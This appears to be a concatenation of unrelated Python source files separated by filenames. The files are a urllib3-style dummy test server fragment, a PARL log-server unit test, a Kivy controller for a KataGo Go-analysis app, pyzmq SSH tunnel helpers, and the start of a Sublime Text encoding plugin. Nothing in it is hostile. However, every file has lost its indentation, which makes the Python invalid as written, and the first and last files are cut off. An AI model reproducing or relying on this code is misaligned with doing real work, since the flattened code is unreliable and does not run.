# has_ipv6 returns true if cPython was compiled with IPv6 support.
# It does not tell us if the system has IPv6 support enabled. To
# determine that we must bind to an IPv6 address.
# https://github.com/shazow/urllib3/pull/611
# https://bugs.python.org/issue658327
try:
sock = socket.socket(socket.AF_INET6)
sock.bind((host, 0))
has_ipv6 = True
except:
pass
if sock:
sock.close()
return has_ipv6
# Some systems may have IPv6 support but DNS may not be configured
# properly. We can not count that localhost will resolve to ::1 on all
# systems. See https://github.com/shazow/urllib3/pull/611 and
# https://bugs.python.org/issue18792
HAS_IPV6_AND_DNS = _has_ipv6('localhost')
HAS_IPV6 = _has_ipv6('::1')
# Different types of servers we have:
class NoIPv6Warning(HTTPWarning):
"IPv6 is not available"
pass
class SocketServerThread(threading.Thread):
"""
:param socket_handler: Callable which receives a socket argument for one
request.
:param ready_event: Event which gets set when the socket handler is
ready to receive requests.
"""
USE_IPV6 = HAS_IPV6_AND_DNS
def __init__(self, socket_handler, host='localhost', port=8081,
ready_event=None):
threading.Thread.__init__(self)
self.daemon = True
self.socket_handler = socket_handler
self.host = host
self.ready_event = ready_event
def _start_server(self):
if self.USE_IPV6:
sock = socket.socket(socket.AF_INET6)
else:
warnings.warn("No IPv6 support. Falling back to IPv4.",
NoIPv6Warning)
sock = socket.socket(socket.AF_INET)
if sys.platform != 'win32':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, 0))
self.port = sock.getsockname()[1]
# Once listen() returns, the server socket is ready
sock.listen(1)
if self.ready_event:
self.ready_event.set()
self.socket_handler(sock)
sock.close()
def run(self):
self.server = self._start_server()
# FIXME: there is a pull request patching bind_sockets in Tornado directly.
# If it gets merged and released we can drop this and use
# `tornado.netutil.bind_sockets` again.
# https://github.com/facebook/tornado/pull/977
def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128,
flags=None):
"""Creates listening sockets bound to the given port and address.
Returns a list of socket objects (multiple sockets are returned if
the given address maps to multiple IP addresses, which is most common
for mixed IPv4 and IPv6 use).
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen() <socket.socket.listen>`.
``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
"""
sockets = []
if address == "":
address = None
if not HAS_IPV6 and family == socket.AF_UNSPEC:
# Python can be compiled with --disable-ipv6, which causes
# operations on AF_INET6 sockets to fail, but does not
# automatically exclude those results from getaddrinfo
# results.
# http://bugs.python.org/issue16208
family = socket.AF_INET
if flags is None:
flags = socket.AI_PASSIVE
binded_port = None
for res in set(socket.getaddrinfo(address, port, family,
socket.SOCK_STREAM, 0, flags)):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if e.args[0] == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
# On linux, ipv6 sockets accept ipv4 too by default,
# but this makes it impossible to bind to both
# 0.0.0.0 in ipv4 and :: in ipv6. On other systems,
# separate sockets *must* be used to listen for both ipv4
# and ipv6. For consistency, always disable ipv4 on our
# ipv6 sockets and use a separate ipv4 socket when needed.
#
# Python 2.x on windows doesn't have IPPROTO_IPV6.
if hasattr(socket, "IPPROTO_IPV6"):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 and IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and binded_port is not None:
sockaddr = tuple([host, binded_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
binded_port = sock.getsockname()[1]
sock.listen(backlog)
sockets.append(sock)
return sockets
def run_tornado_app(app, io_loop, certs, scheme, host):
app.last_req = datetime.fromtimestamp(0)
if scheme == 'https':
http_server = tornado.httpserver.HTTPServer(app, ssl_options=certs,
io_loop=io_loop)
else:
http_server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)
sockets = bind_sockets(None, address=host)
port = sockets[0].getsockname()[1]
http_server.add_sockets(sockets)
return http_server, port
def run_loop_in_thread(io_loop):
t = threading.Thread(target=io_loop.start)
t.start()
return t
def get_unreachable_address():
while True:
host = ''.join(random.choice(string.ascii_lowercase)
for _ in range(60))
sockaddr = (host, 54321)
# check if we are really "lucky" and hit an actual server
try:
s = socket.create_connection(sockaddr)
except socket.error:
return sockaddr
else:
s.close()
if __name__ == '__main__':
# For debugging dummyserver itself - python -m dummyserver.server
from .testcase import TestingApp
host = '127.0.0.1'
io_loop = tornado.ioloop.IOLoop()
app = tornado.web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, None,
'http', host)
server_thread = run_loop_in_thread(io_loop)
print("Listening on http://{host}:{port}".format(host=host, port=port))
|
log_server_test.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import requests
requests.adapters.DEFAULT_RETRIES = 5
import parl
from parl.remote.client import disconnect, get_global_client
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import _IS_WINDOWS
from parl.utils import get_free_tcp_port
@parl.remote_class
class Actor(object):
def __init__(self, number=None, arg1=None, arg2=None):
self.number = number
self.arg1 = arg1
self.arg2 = arg2
print("Init actor...")
self.init_output = "Init actor...\n"
def sim_output(self, start, end):
output = ""
print(self.number)
output += str(self.number)
output += "\n"
for i in range(start, end):
print(i)
output += str(i)
output += "\n"
return self.init_output + output
class TestLogServer(unittest.TestCase):
def tearDown(self):
disconnect()
#In windows, multiprocessing.Process cannot run the method of class, but static method is ok.
@staticmethod
def _connect_and_create_actor(cluster_addr):
parl.connect(cluster_addr)
outputs = []
for i in range(2):
actor = Actor(number=i)
ret = actor.sim_output(1, 4)
assert ret != ""
outputs.append(ret)
return outputs
def test_log_server(self):
master_port = get_free_tcp_port()
# start the master
master = Master(port=master_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = get_free_tcp_port()
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
outputs = self._connect_and_create_actor(cluster_addr)
# Get status
status = master._get_status()
client_jobs = pickle.loads(status).get('client_jobs')
self.assertIsNotNone(client_jobs)
# Get job id
client = get_global_client()
jobs = client_jobs.get(client.client_id)
self.assertIsNotNone(jobs)
for job_id, log_server_addr in jobs.items():
log_url = "http://{}/get-log".format(log_server_addr)
# Test response without job_id
r = requests.get(log_url)
self.assertEqual(r.status_code, 400)
# Test normal response
r = requests.get(log_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = "http://{}/download-log".format(log_server_addr)
r = requests.get(download_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
disconnect()
worker.exit()
master.exit()
def test_monitor_query_log_server(self):
master_port = get_free_tcp_port()
monitor_port = get_free_tcp_port()
# start the master
master = Master(port=master_port, monitor_port=monitor_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
# start the cluster monitor
monitor_file = __file__.replace('log_server_test.pyc', '../monitor.py')
monitor_file = monitor_file.replace('log_server_test.py',
'../monitor.py')
command = [
sys.executable, monitor_file, "--monitor_port",
str(monitor_port), "--address", "localhost:" + str(master_port)
]
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
monitor_proc = subprocess.Popen(
command, stdout=FNULL, stderr=subprocess.STDOUT, close_fds=True)
# Start worker
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = get_free_tcp_port()
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
# Test monitor API
outputs = self._connect_and_create_actor(cluster_addr)
time.sleep(5) # Wait for the status update
client = get_global_client()
jobs_url = "{}/get-jobs?client_id={}".format(master.monitor_url,
client.client_id)
r = requests.get(jobs_url)
self.assertEqual(r.status_code, 200)
data = json.loads(r.text)
for job in data:
log_url = job.get('log_url')
self.assertIsNotNone(log_url)
r = requests.get(log_url)
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = job.get('download_url')
r = requests.get(download_url)
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Clean context
monitor_proc.kill()
monitor_proc.wait()
disconnect()
worker.exit()
master.exit()
if __name__ == '__main__':
unittest.main()
|
controller.py
|
import copy
import json
import os
import random
import re
import shlex
import subprocess
import sys
import threading
import time
from queue import Queue
from kivy.clock import Clock
from kivy.storage.jsonstore import JsonStore
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.checkbox import CheckBox
from kivy.uix.filechooser import FileChooserListView
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from board import Board, IllegalMoveException, Move
BASE_PATH = getattr(sys, "_MEIPASS", os.path.dirname(os.path.abspath(__file__)))
config_file = sys.argv[1] if len(sys.argv) > 1 else os.path.join(BASE_PATH, "config.json")
print(f"Using config file {config_file}")
Config = JsonStore(config_file)
class EngineControls(GridLayout):
def __init__(self, **kwargs):
super(EngineControls, self).__init__(**kwargs)
self.command = os.path.join(BASE_PATH, Config.get("engine")["command"])
if "win" not in sys.platform:
self.command = shlex.split(self.command)
analysis_settings = Config.get("analysis")
self.visits = [[analysis_settings["pass_visits"], analysis_settings["visits"]], [analysis_settings["pass_visits_fast"], analysis_settings["visits_fast"]]]
self.train_settings = Config.get("trainer")
self.debug = Config.get("debug")["level"]
self.board_size = Config.get("board")["size"]
self.ready = False
self.message_queue = None
self.board = Board(self.board_size)
self.komi = 6.5 # loaded from config in init
self.outstanding_analysis_queries = [] # allows faster interaction while kata is starting
self.kata = None
self.query_time = {}
def show_error(self, msg):
print(f"ERROR: {msg}")
self.info.text = msg
def redraw(self, include_board=False):
if include_board:
Clock.schedule_once(self.parent.board.draw_board, -1) # main thread needs to do this
Clock.schedule_once(self.parent.board.redraw, -1)
def restart(self, board_size=None):
self.ready = False
if not self.message_queue:
self.message_queue = Queue()
self.engine_thread = threading.Thread(target=self._engine_thread, daemon=True).start()
else:
with self.message_queue.mutex:
self.message_queue.queue.clear()
self.action("init", board_size or self.board_size)
def action(self, message, *args):
self.message_queue.put([message, *args])
# engine main loop
def _engine_thread(self):
try:
self.kata = subprocess.Popen(self.command, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
except FileNotFoundError:
self.show_error(
f"Starting kata with command '{self.command}' failed. If you are on Mac or Linux, please edit configuration file '{config_file}' to point to the correct KataGo executable."
)
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True).start()
msg, *args = self.message_queue.get()
while True:
try:
if self.debug:
print("MESSAGE", msg, args)
getattr(self, f"_do_{msg.replace('-','_')}")(*args)
except Exception as e:
self.show_error(f"Exception in Engine thread: {e}")
raise
msg, *args = self.message_queue.get()
def play(self, move, faster=False):
try:
mr = self.board.play(move)
except IllegalMoveException as e:
self.info.text = f"Illegal move: {str(e)}"
return
self.update_evaluation()
if not mr.analysis_ready: # replayed old move
self._request_analysis(mr, faster=faster)
return mr
def show_evaluation_stats(self, move):
if move.analysis_ready:
self.score.text = move.format_score().replace("-", "\u2013")
self.temperature.text = f"{move.temperature_stats[2]:.1f}"
if move.parent and move.parent.analysis_ready:
if move.evaluation is not None:
self.evaluation.text = f"{move.evaluation:.1%}"
else:
self.evaluation.text = f"?"
# handles showing completed analysis and triggered actions like auto undo and ai move
def update_evaluation(self):
current_move = self.board.current_move
self.score.set_prisoners(self.board.prisoner_count)
current_player_is_human_or_both_robots = not self.ai_auto.active(current_move.player) or self.ai_auto.active(1 - current_move.player)
if current_player_is_human_or_both_robots and current_move is not self.board.root:
self.info.text = current_move.comment(eval=True, hints=self.hints.active(current_move.player))
self.evaluation.text = ""
if current_player_is_human_or_both_robots:
self.show_evaluation_stats(current_move)
if current_move.analysis_ready and current_move.parent and current_move.parent.analysis_ready and not current_move.children and not current_move.x_comment.get("undo"):
# handle automatic undo
if self.auto_undo.active(current_move.player) and not self.ai_auto.active(current_move.player) and not current_move.auto_undid:
ts = self.train_settings
# TODO: is this overly generous wrt low visit outdated evaluations?
evaluation = current_move.evaluation if current_move.evaluation is not None else 1 # assume move is fine if temperature is negative
move_eval = max(evaluation, current_move.outdated_evaluation or 0)
points_lost = (current_move.parent or current_move).temperature_stats[2] * (1 - move_eval)
if move_eval < ts["undo_eval_threshold"] and points_lost >= ts["undo_point_threshold"]:
if self.num_undos(current_move) == 0:
current_move.x_comment["undid"] = f"Move was below threshold, but no undo granted (probability is {ts['num_undo_prompts']:.0%}).\n"
self.update_evaluation()
else:
current_move.auto_undid = True
self.board.undo()
if len(current_move.parent.children) >= ts["num_undo_prompts"] + 1:
best_move = sorted([m for m in current_move.parent.children], key=lambda m: -(m.evaluation_info[0] or 0))[0]
best_move.x_comment["undo_autoplay"] = f"Automatically played as best option after max. {ts['num_undo_prompts']} undo(s).\n"
self.board.play(best_move)
self.update_evaluation()
return
# ai player doesn't technically need parent ready, but don't want to override waiting for undo
current_move = self.board.current_move # this effectively checks undo didn't just happen
if self.ai_auto.active(1 - current_move.player) and not self.board.game_ended:
if current_move.children:
self.info.text = "AI paused since moves were undone. Press 'AI Move' or choose a move for the AI to continue playing."
else:
self._do_aimove()
self.redraw(include_board=False)
# engine action functions
def _do_play(self, *args):
self.play(Move(player=self.board.current_player, coords=args[0]))
def _do_aimove(self):
ts = self.train_settings
while not self.board.current_move.analysis_ready:
self.info.text = "Thinking..."
time.sleep(0.05)
# select move
current_move = self.board.current_move
pos_moves = [
(d["move"], float(d["scoreLead"]), d["evaluation"]) for i, d in enumerate(current_move.ai_moves) if i == 0 or int(d["visits"]) >= ts["balance_play_min_visits"]
]
sel_moves = pos_moves[:1]
# don't play suicidal to balance score - pass when it's best
if self.ai_balance.active and pos_moves[0][0] != "pass":
sel_moves = [
(move, score, move_eval)
for move, score, move_eval in pos_moves
if move_eval > ts["balance_play_randomize_eval"]
and -current_move.player_sign * score > 0
or move_eval > ts["balance_play_min_eval"]
and -current_move.player_sign * score > ts["balance_play_target_score"]
] or sel_moves
aimove = Move(player=self.board.current_player, gtpcoords=random.choice(sel_moves)[0], robot=True)
if len(sel_moves) > 1:
aimove.x_comment["ai"] = "AI Balance on, moves considered: " + ", ".join(f"{move} ({aimove.format_score(score)})" for move, score, _ in sel_moves) + "\n"
self.play(aimove)
def num_undos(self, move):
if self.train_settings["num_undo_prompts"] < 1:
return int(move.undo_threshold < self.train_settings["num_undo_prompts"])
else:
return self.train_settings["num_undo_prompts"]
def _do_undo(self):
if (
self.ai_lock.active
and self.auto_undo.active(self.board.current_move.player)
and len(self.board.current_move.parent.children) > self.num_undos(self.board.current_move)
and not self.train_settings.get("dont_lock_undos")
):
self.info.text = f"Can't undo this move more than {self.num_undos(self.board.current_move)} time(s) when locked"
return
self.board.undo()
self.update_evaluation()
def _do_redo(self):
self.board.redo()
self.update_evaluation()
def _do_redo_branch(self, direction):
self.board.switch_branch(direction)
self.update_evaluation()
def _do_init(self, board_size, komi=None):
self.board_size = board_size
self.komi = float(komi or Config.get("board").get(f"komi_{board_size}", 6.5))
self.board = Board(board_size)
self._request_analysis(self.board.root)
self.redraw(include_board=True)
self.ready = True
if self.ai_lock.active:
self.ai_lock.checkbox._do_press()
for el in [self.ai_lock.checkbox, self.hints.black, self.hints.white, self.ai_auto.black, self.ai_auto.white, self.auto_undo.black, self.auto_undo.white, self.ai_move]:
el.disabled = False
def universal_read(self, file):
with open(file, "rb") as f:
bin_c = f.read()
for encoding in ["utf-8", "iso-8859-1", "cp949", "GB18030"]:
try:
return bin_c.decode(encoding=encoding)
except:
pass
self.show_error(f"could not decode file contents of {file}")
return ""
def _do_analyze_sgf(self, sgf, faster=False, rewind=False):
sgfprops = {k: v.strip("[]").split("][") if k in ["AB", "AW"] else v.strip("[]") for k, v in re.findall(r"\b(\w+)((?:\[.*?\])+)", sgf)}
size = int(sgfprops.get("SZ", self.board_size))
sgfmoves = re.findall(r"\b([BW])\[([a-z]{2})\]", sgf)
if not sgfmoves and not sgfprops:
fileselect_popup = Popup(title="Double Click SGF file to analyze", size_hint=(0.8, 0.8))
fc = FileChooserListView(multiselect=False, path=os.path.expanduser("~"), filters=["*.sgf"])
blui = BoxLayout(orientation="horizontal", size_hint=(1, 0.1))
cbfast = CheckBox(color=(0.95, 0.95, 0.95, 1))
cbrewind = CheckBox(color=(0.95, 0.95, 0.95, 1))
for widget in [Label(text="Analyze Extra Fast"), cbfast, Label(text="Rewind to start"), cbrewind]:
blui.add_widget(widget)
bl = BoxLayout(orientation="vertical")
bl.add_widget(fc)
bl.add_widget(blui)
fileselect_popup.add_widget(bl)
def readfile(files, _mouse):
fileselect_popup.dismiss()
self.action("analyze-sgf", self.universal_read((files[0])), cbfast.active, cbrewind.active)
fc.on_submit = readfile
fileselect_popup.open()
return
self._do_init(size, sgfprops.get("KM"))
handicap = int(sgfprops.get("HA", 0))
if handicap and not "AB" in sgfprops:
self.board.place_handicap_stones(handicap)
placements = [Move(player=pl, sgfcoords=(mv, self.board_size)) for pl, player in enumerate(Move.PLAYERS) for mv in sgfprops.get("A" + player, [])]
for placement in placements: # free handicaps
self.board.play(placement) # bypass analysis
if handicap or placements:
self._request_analysis(self.board.current_move) # ensure next move analysis works
moves = [Move(player=Move.PLAYERS.index(p.upper()), sgfcoords=(mv, self.board_size)) for p, mv in sgfmoves]
for move in moves:
self.play(move, faster=faster and move != moves[-1])
if rewind:
self.board.rewind()
# analysis thread
def _analysis_read_thread(self):
while True:
while self.outstanding_analysis_queries:
self._send_analysis_query(self.outstanding_analysis_queries.pop(0))
line = self.kata.stdout.readline()
if not line: # occasionally happens?
return
try:
analysis = json.loads(line)
except json.JSONDecodeError as e:
print(f"JSON decode error: '{e}' encountered after receiving input '{line}'")
return
if self.debug:
print(f"[{time.time()-self.query_time.get(analysis['id'],0):.1f}] kata analysis received:", line[:80], "...")
if "error" in analysis:
print(analysis)
self.show_error(f"ERROR IN KATA ANALYSIS: {analysis['error']}")
else:
self.board.store_analysis(analysis)
self.update_evaluation()
def _send_analysis_query(self, query):
self.query_time[query["id"]] = time.time()
if self.kata:
self.kata.stdin.write((json.dumps(query) + "\n").encode())
self.kata.stdin.flush()
else: # early on / root / etc
self.outstanding_analysis_queries.append(copy.copy(query))
def _request_analysis(self, move, faster=False):
faster_fac = 5 if faster else 1
move_id = move.id
moves = self.board.moves
fast = self.ai_fast.active
query = {
"id": str(move_id),
"moves": [[m.bw_player(), m.gtp()] for m in moves],
"rules": "japanese",
"komi": self.komi,
"boardXSize": self.board_size,
"boardYSize": self.board_size,
"analyzeTurns": [len(moves)],
"includeOwnership": True,
"maxVisits": self.visits[fast][1] // faster_fac,
}
if self.debug:
print(f"sending query for move {move_id}: {str(query)[:80]}")
self._send_analysis_query(query)
query.update({"id": f"PASS_{move_id}", "maxVisits": self.visits[fast][0] // faster_fac, "includeOwnership": False})
query["moves"] += [[move.bw_player(next_move=True), "pass"]]
query["analyzeTurns"][0] += 1
self._send_analysis_query(query)
def output_sgf(self):
return self.board.write_sgf(self.komi, self.train_settings)
|
tunnel.py
|
"""Basic ssh tunnel utilities, and convenience functions for tunneling
zeromq connections.
"""
# Copyright (C) 2010-2011 IPython Development Team
# Copyright (C) 2011- PyZMQ Developers
#
# Redistributed from IPython under the terms of the BSD License.
import atexit
import os
import re
import signal
import socket
import sys
import warnings
from getpass import getpass
from getpass import getuser
from multiprocessing import Process
try:
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecationWarning)
import paramiko
SSHException = paramiko.ssh_exception.SSHException
except ImportError:
paramiko = None # type:ignore[assignment]
class SSHException(Exception): # type: ignore
pass
else:
from .forward import forward_tunnel
try:
import pexpect # type: ignore
except ImportError:
pexpect = None
def select_random_ports(n):
"""Select and return n random ports that are available."""
ports = []
sockets = []
for _ in range(n):
sock = socket.socket()
sock.bind(("", 0))
ports.append(sock.getsockname()[1])
sockets.append(sock)
for sock in sockets:
sock.close()
return ports
# -----------------------------------------------------------------------------
# Check for passwordless login
# -----------------------------------------------------------------------------
_password_pat = re.compile((r"pass(word|phrase):".encode("utf8")), re.IGNORECASE)
def try_passwordless_ssh(server, keyfile, paramiko=None):
"""Attempt to make an ssh connection without a password.
This is mainly used for requiring password input only once
when many tunnels may be connected to the same server.
If paramiko is None, the default for the platform is chosen.
"""
if paramiko is None:
paramiko = sys.platform == "win32"
if not paramiko:
f = _try_passwordless_openssh
else:
f = _try_passwordless_paramiko
return f(server, keyfile)
def _try_passwordless_openssh(server, keyfile):
"""Try passwordless login with shell ssh command."""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko")
cmd = "ssh -f " + server
if keyfile:
cmd += " -i " + keyfile
cmd += " exit"
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop("SSH_ASKPASS", None)
ssh_newkey = "Are you sure you want to continue connecting"
p = pexpect.spawn(cmd, env=env)
while True:
try:
i = p.expect([ssh_newkey, _password_pat], timeout=0.1)
if i == 0:
raise SSHException("The authenticity of the host can't be established.")
except pexpect.TIMEOUT:
continue
except pexpect.EOF:
return True
else:
return False
def _try_passwordless_paramiko(server, keyfile):
"""Try passwordless login with paramiko."""
if paramiko is None:
msg = "Paramiko unavailable, "
if sys.platform == "win32":
msg += "Paramiko is required for ssh tunneled connections on Windows."
else:
msg += "use OpenSSH."
raise ImportError(msg)
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(server, port, username=username, key_filename=keyfile, look_for_keys=True)
except paramiko.AuthenticationException:
return False
else:
client.close()
return True
def tunnel_connection(socket, addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Connect a socket to an address via an ssh tunnel.
This is a wrapper for socket.connect(addr), when addr is not accessible
from the local machine. It simply creates an ssh tunnel using the remaining args,
and calls socket.connect('tcp://localhost:lport') where lport is the randomly
selected local port of the tunnel.
"""
new_url, tunnel = open_tunnel(
addr,
server,
keyfile=keyfile,
password=password,
paramiko=paramiko,
timeout=timeout,
)
socket.connect(new_url)
return tunnel
def open_tunnel(addr, server, keyfile=None, password=None, paramiko=None, timeout=60):
"""Open a tunneled connection from a 0MQ url.
For use inside tunnel_connection.
Returns
-------
(url, tunnel) : (str, object)
The 0MQ url that has been forwarded, and the tunnel object
"""
lport = select_random_ports(1)[0]
transport, addr = addr.split("://")
ip, rport = addr.split(":")
rport = int(rport)
if paramiko is None:
paramiko = sys.platform == "win32"
if paramiko:
tunnelf = paramiko_tunnel
else:
tunnelf = openssh_tunnel
tunnel = tunnelf(
lport,
rport,
server,
remoteip=ip,
keyfile=keyfile,
password=password,
timeout=timeout,
)
return "tcp://127.0.0.1:%i" % lport, tunnel
def openssh_tunnel(
lport, rport, server, remoteip="127.0.0.1", keyfile=None, password=None, timeout=60
):
"""Create an ssh tunnel using command-line ssh that connects port lport
on this machine to localhost:rport on server. The tunnel
will automatically close when not in use, remaining open
for a minimum of timeout seconds for an initial connection.
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if pexpect is None:
raise ImportError("pexpect unavailable, use paramiko_tunnel")
ssh = "ssh "
if keyfile:
ssh += "-i " + keyfile
if ":" in server:
server, port = server.split(":")
ssh += " -p %s" % port
cmd = "%s -O check %s" % (ssh, server)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
pid = int(output[output.find(b"(pid=") + 5 : output.find(b")")]) # noqa
cmd = "%s -O forward -L 127.0.0.1:%i:%s:%i %s" % (
ssh,
lport,
remoteip,
rport,
server,
)
(output, exitstatus) = pexpect.run(cmd, withexitstatus=True)
if not exitstatus:
atexit.register(_stop_tunnel, cmd.replace("-O forward", "-O cancel", 1))
return pid
cmd = "%s -f -S none -L 127.0.0.1:%i:%s:%i %s sleep %i" % (
ssh,
lport,
remoteip,
rport,
server,
timeout,
)
# pop SSH_ASKPASS from env
env = os.environ.copy()
env.pop("SSH_ASKPASS", None)
ssh_newkey = "Are you sure you want to continue connecting"
tunnel = pexpect.spawn(cmd, env=env)
failed = False
while True:
try:
i = tunnel.expect([ssh_newkey, _password_pat], timeout=0.1)
if i == 0:
raise SSHException("The authenticity of the host can't be established.")
except pexpect.TIMEOUT:
continue
except pexpect.EOF as e:
if tunnel.exitstatus:
print(tunnel.exitstatus)
print(tunnel.before)
print(tunnel.after)
raise RuntimeError("tunnel '%s' failed to start" % (cmd)) from e
else:
return tunnel.pid
else:
if failed:
print("Password rejected, try again")
password = None
if password is None:
password = getpass("%s's password: " % (server))
tunnel.sendline(password)
failed = True
def _stop_tunnel(cmd):
pexpect.run(cmd)
def _split_server(server):
if "@" in server:
username, server = server.split("@", 1)
else:
username = getuser()
if ":" in server:
server, port = server.split(":")
port = int(port)
else:
port = 22
return username, server, port
def paramiko_tunnel(
lport, rport, server, remoteip="127.0.0.1", keyfile=None, password=None, timeout=60
):
"""launch a tunner with paramiko in a subprocess. This should only be used
when shell ssh is unavailable (e.g. Windows).
This creates a tunnel redirecting `localhost:lport` to `remoteip:rport`,
as seen from `server`.
If you are familiar with ssh tunnels, this creates the tunnel:
ssh server -L localhost:lport:remoteip:rport
keyfile and password may be specified, but ssh config is checked for defaults.
Parameters
----------
lport : int
local port for connecting to the tunnel from this machine.
rport : int
port on the remote machine to connect to.
server : str
The ssh server to connect to. The full ssh server string will be parsed.
user@server:port
remoteip : str [Default: 127.0.0.1]
The remote ip, specifying the destination of the tunnel.
Default is localhost, which means that the tunnel would redirect
localhost:lport on this machine to localhost:rport on the *server*.
keyfile : str; path to public key file
This specifies a key to be used in ssh login, default None.
Regular default ssh keys will be used without specifying this argument.
password : str;
Your ssh password to the ssh server. Note that if this is left None,
you will be prompted for it if passwordless key based login is unavailable.
timeout : int [default: 60]
The time (in seconds) after which no activity will result in the tunnel
closing. This prevents orphaned tunnels from running forever.
"""
if paramiko is None:
raise ImportError("Paramiko not available")
if password is None:
if not _try_passwordless_paramiko(server, keyfile):
password = getpass("%s's password: " % (server))
p = Process(
target=_paramiko_tunnel,
args=(lport, rport, server, remoteip),
kwargs=dict(keyfile=keyfile, password=password),
)
p.daemon = True
p.start()
return p
def _paramiko_tunnel(lport, rport, server, remoteip, keyfile=None, password=None):
"""Function for actually starting a paramiko tunnel, to be passed
to multiprocessing.Process(target=this), and not called directly.
"""
username, server, port = _split_server(server)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.WarningPolicy())
try:
client.connect(
server,
port,
username=username,
key_filename=keyfile,
look_for_keys=True,
password=password,
)
# except paramiko.AuthenticationException:
# if password is None:
# password = getpass("%s@%s's password: "%(username, server))
# client.connect(server, port, username=username, password=password)
# else:
# raise
except Exception as e:
print("*** Failed to connect to %s:%d: %r" % (server, port, e))
sys.exit(1)
# Don't let SIGINT kill the tunnel subprocess
signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
forward_tunnel(lport, remoteip, rport, client.get_transport())
except KeyboardInterrupt:
print("SIGINT: Port forwarding stopped cleanly")
sys.exit(0)
except Exception as e:
print("Port forwarding stopped uncleanly: %s" % e)
sys.exit(255)
if sys.platform == "win32":
ssh_tunnel = paramiko_tunnel
else:
ssh_tunnel = openssh_tunnel
__all__ = [
"tunnel_connection",
"ssh_tunnel",
"openssh_tunnel",
"paramiko_tunnel",
"try_passwordless_ssh",
]
|
ConvertToUTF8.py
|
# -*- coding: utf-8 -*-
import sublime, sublime_plugin
import sys
import os
if sys.version_info < (3, 0):
from chardet.universaldetector import UniversalDetector
NONE_COMMAND = (None, None, 0)
ST3 = False
else:
from .chardet.universaldetector import UniversalDetector
NONE_COMMAND = ('', None, 0)
ST3 = True
import codecs
import threading
import json
import time
import hashlib
import shutil
SKIP_ENCODINGS = ('ASCII', 'UTF-8', 'UTF-16LE', 'UTF-16BE')
SUPERSETS = {
'GB2312': 'GBK',
